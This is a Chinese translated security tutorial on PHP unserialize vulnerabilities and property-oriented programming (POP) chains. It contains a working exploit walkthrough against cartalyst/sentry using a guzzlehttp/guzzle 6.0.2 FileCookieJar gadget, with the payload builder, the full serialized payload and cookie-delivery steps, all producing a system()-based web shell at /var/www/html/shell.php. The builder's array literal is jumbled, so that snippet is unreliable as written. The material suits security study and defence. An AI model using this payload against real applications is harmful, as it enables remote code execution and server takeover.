t017a26a5a62ca44b86.gif



一、序列化和反序列化


序列化和反序列化的目的是使得程序间传输对象会更加方便。序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别为serialize()和unserialize()。反序列化本身并不危险,但是如果反序列化时,传入反序列化函数的参数可以被用户控制那将会是一件非常危险的事情。不安全的进行反序列化造成的危害只有你想不到,没有他做不到,是的,没错。

序列化和反序列化的原理已经有很多文章了,这里就不赘述了。PHP的类有很多的 '魔术方法' ,比如:

1
2
3
4
5
6
7
8
9
10
__construct(), __destruct()
__call(), __callStatic()
__get(), __set()
__isset(), __unset()
__sleep(), __wakeup()
__toString()
__invoke()
__set_state()
__clone()
__debugInfo()

这么多的魔术方法中我们所需要关注的方法也就是__destruct() 和 __wakeup() 方法.这两个方法中前者是在对象被销毁时程序会自动调用,后者是在类对象被反序列化时被调用.所以这两个方法是在 对象反序列化一直到程序执行完毕这整个过程中,必定会被调用的方法,如果在这两个函数中有一些危险的动作,并且能够被我们所利用,那么漏洞并出现了。


二、反序列漏洞的利用思路


理论  

在反序列化中,我们所能控制的数据就是对象中的各个属性值,所以在PHP的反序列化有一种漏洞利用方法叫做 "面向属性编程" ,即 POP( Property Oriented Programming)。和二进制漏洞中常用的ROP技术类似。在ROP中我们往往需要一段初始化gadgets来开始我们的整个利用过程,然后继续调用其他gadgets。在PHP反序列化漏洞利用技术POP中,对应的初始化gadgets就是__wakeup() 或者是__destruct() 方法, 在最理想的情况下能够实现漏洞利用的点就在这两个函数中,但往往我们需要从这个函数开始,逐步的跟进在这个函数中调用到的所有函数,直至找到可以利用的点为止。下面列举些在跟进其函数调用过程中需要关注一些很有价值的函数。

t01d0f6630be25385c5.png

如果在跟进程序过程中发现这些函数就要打起精神,一旦这些函数的参数我们能够控制,就有可能出现高危漏洞.

Demo

所使用的代码。

DemoPopChain.php

1
2
3
4
5
6
7
8
9
10
11
<?php
    class DemoPopChain{
    private $data = “bar\n”;
    private $filename = ‘/tmp/foo’;
    public function __wakeup(){
        $this->save($this->filename);
    }
        public function save($filename){
        file_put_contents($filename, $this->data);
    }
?>

unserialize.php

1
2
3
4
<?php
        require(‘./DemoPopChain.php’);
        unserialize(file_get_contents(‘./serialized.txt));
?>

这是一个很简单的具有反序列漏洞的代码,程序从serialized.txt文件中读取需要进行反序列化的字符串。这个我们可控。同时该文件还定义了一个 DemoPopChain 类,并且该类实现了 __wakeup 函数,然后在该函数中,又调用了save函数,其参数为 类对象的filename属性值,然后在 save函数中调用了 file_put_contents 函数,该函数的两个参数分别为从save函数中传下来的 filename属性值 和 该对象的data属性值。又由于在反序列化的过程中被反序列化的对象的属性值是我们可控的,于是我们就通过对函数的嵌套调用和对象属性值的使用得到了一个 任意文件写入任意内容的漏洞.这就是所谓的POP。就是关注整个函数的调用过程中参数的传递情况,找到可利用的点,这和一般的Web漏洞没什么区别,只是可控制的值有直接传递给程序的参数转变为了 对象中的属性值。


三、现实中查找反序列化漏洞及构造exploit的方法


前置知识

PHP的 unserialize() 函数只能反序列化在当前程序上下文中已经被定义过的类.在传统的PHP中你需要通过使用一大串的include() 或者 require()来包含所需的类定义文件。于是后来出现了 autoloading 技术,他可以自动导入需要使用的类,再也不需要程序员不断地复制粘贴 那些include代码了。这种技术同时也方便了我们的漏洞利用.因为在我们找到一个反序列化点的时候我们所能使用的类就多了,那么实现漏洞利用的可能性也就更加高。

还有一个东西要提一下,那就是Composer,这是一个php的包管理工具,同时他还能自动导入所以依赖库中定义的类。这样一来 unserialize() 函数也就能使用所有依赖库中的类了,攻击面又增大不少。

1.Composer配置的依赖库存储在vendor目录下

2.如果要使用Composer的自动类加载机制,只需要在php文件的开头加上 require __DIR__ . '/vendor/autoload.php';

漏洞发现技巧

默认情况下  Composer 会从  Packagist下载包,那么我们可以通过审计这些包来找到可利用的 POP链。

找PHP链的基本思路.

1.在各大流行的包中搜索 __wakeup() 和 __destruct() 函数.

2.追踪调用过程

3.手工构造 并验证 POP 链

4.开发一个应用使用该库和自动加载机制,来测试exploit.

构造exploit的思路

1.寻找可能存在漏洞的应用

2.在他所使用的库中寻找 POP gadgets

3.在虚拟机中安装这些库,将找到的POP链对象序列化,在反序列化测试payload

4.将序列化之后的payload发送到有漏洞web应用中进行测试.

Example

1. 寻找可能存在漏洞的应用:   cartalyst/sentry

漏洞代码: /src/Cartalyst/Sentry/Cookies/NativeCookie.php

1
2
3
4
5
6
7
8
     ...
  public function getCookie()
  {
     ...
     return unserialize($_COOKIE[$this->getKey()]);
     ...
  }
}

这里从 cookie中获取了值,然后直接将他序列化.

2.程序使用的库中的POP Gadgets: guzzlehttp/guzzle

找Gadgets的最好的一个地方就是composer.json文件,他写明了程序需要使用的库.

1
2
3
4
5
6
7
8
  {
    "require": {
    "cartalyst/sentry": "2.1.5",
    "illuminate/database": "4.0.*",
    "guzzlehttp/guzzle": "6.0.2",
    "swiftmailer/swiftmailer": "5.4.1"
  }
}

a.从git repo下载这些库

b.在其中搜索__wakeup() 和 __destruct() 函数

/guzzle/src/Cookie/FileCookieJar.php

1
2
3
4
5
6
7
8
namespace GuzzleHttp\Cookie;
class FileCookieJar extends CookieJar
  ...
  public function __destruct()
  {
    $this->save($this->filename);
  }
  ...

这里使用类对象的filename属性值作为参数传入了save函数.我们来看看save函数具体实现.

FileCookieJar->save()

1
2
3
4
5
6
7
8
9
10
11
12
13
public function save($filename)
{
$json = [];
foreach ($this as $cookie) {
  /** @var SetCookie $cookie */
  if ($cookie->getExpires() && !$cookie->getDiscard()) {
    $json[] = $cookie->toArray();
  }
 }
if (false === file_put_contents($filename, json_encode($json))) {
    throw new \RuntimeException("Unable to save file {$filename}");
  }
}

可以看到我们传入的参数最后是直接被作为要写入内容的文件的文件名.这下文件名可控了,如果我们再能够控制文件的内容就能实现getshell了.通过代码可以发现文件的内容为上面一层循环中来得到的数组经过json编码后得到的.而数组中的内容为 $cookie->toArray() ,那么我们得去找到 $cookie对象是在哪定义的来确定他返回的值是什么,以及是否可利用.还有一点,我们还需要过掉那个判断才能给 json 数组赋值.所以我们需要关注的有三个点.

1
2
3
$cookie->getExpires()
!$cookie->getDiscard()
$json[] = $cookie->toArray()

我们并不知道$cookie 具体是什么类,我们可以通过搜索函数名,来定位这个类.通过这样定位到了SetCookie类.其代码如下.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
namespace GuzzleHttp\Cookie;
class SetCookie
    ...
    public function toArray(){
       return $this->data;
    }
    ...
    public function getExpires(){
        return $this->data['Expires'];
    }
    ...
    public function getDiscard(){
        return $this->data['Discard'];
    }

可以看到那三个方法只是简单的返回了data数组的特定键值.

3.搭建环境进行poc测试

首先在虚拟机里创建这样一个composer.json文件来安装提供POP gadgets的库.

1
2
3
4
5
{
    "require": {
        "guzzlehttp/guzzle": "6.0.2"
    }
}

之后使用这个文件安装库

t012d1df5d752bcba71.png

然后使用这个库,来构造反序列化的payload

1
2
3
4
5
6
7
8
9
10
11
12
<?php
    require __DIR__ . '/vendor/autoload.php';
    use GuzzleHttp\Cookie\FileCookieJar;
    use GuzzleHttp\Cookie\SetCookie;
    $obj = new FileCookieJar('/var/www/html/shell.php');
    $payload = '<?php echo system($_POST[\'poc\']); ?>';
    $obj->setCookie(new SetCookie([
        'Name' => 'foo', 'Value'
        'Domain' => $payload,
        => 'bar',
        'Expires' => time()]));
    file_put_contents('./built_payload_poc', serialize($obj));

运行这个文件得到payload

1
2
3
# php build_payload.php
# cat built_payload_poc
O:31:"GuzzleHttp\Cookie\FileCookieJar":3:{s:41:"GuzzleHttp\Cookie\FileCookieJarfilename";s:23:"/var/www/html/shell.php";s:36:"GuzzleHttp\Cookie\CookieJarcookies";a:1:{i:1;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:33:"GuzzleHttp\Cookie\SetCookiedata";a:9:{s:4:"Name";s:3:"foo";s:5:"Value";s:3:"bar";s:6:"Domain";s:36:"<?php echo system($_POST['poc']);?>";s:4:"Path";s:1:"/";s:7:"Max-Age";N;s:7:"Expires";i:1450225029;s:6:"Secure";b:0;s:7:"Discard";b:0;s:8:"HttpOnly";b:0;}}}s:39:"GuzzleHttp\Cookie\CookieJarstrictMode";N;}

现在payload已经生成,我们在创建一个文件来测试这个payload的结果.

1
2
3
<?php
    require __DIR__ . '/vendor/autoload.php';
    unserialize(file_get_contents("./built_payload_poc"));

这个文件的内容很简单,就是把我们刚刚生成的payload反序列化.来看看效果

t01e7e53046d79453d0.png

成功写入一个shell.

4.寻找使用了这个漏洞库并且有反序列化操作的程序这里是cartalyst/sentry,然后拿POC去打就好.

演示:

首先网站目录没有shell.php文件

t01312cee925ef2bffe.png

让我们将cartalyst_sentry的cookie值设为经过url编码的反序列化payload,然后发送到应用中去.

t01d52cdff1fee6f1c7.png

现在shell.php已经出现了

t01915b9b31efa17564.png


本文由 安全客 翻译,翻译:hac425

原文链接:https://www.insomniasec.com/downloads/publications/Practical%20PHP%20Object%20Injection.pdf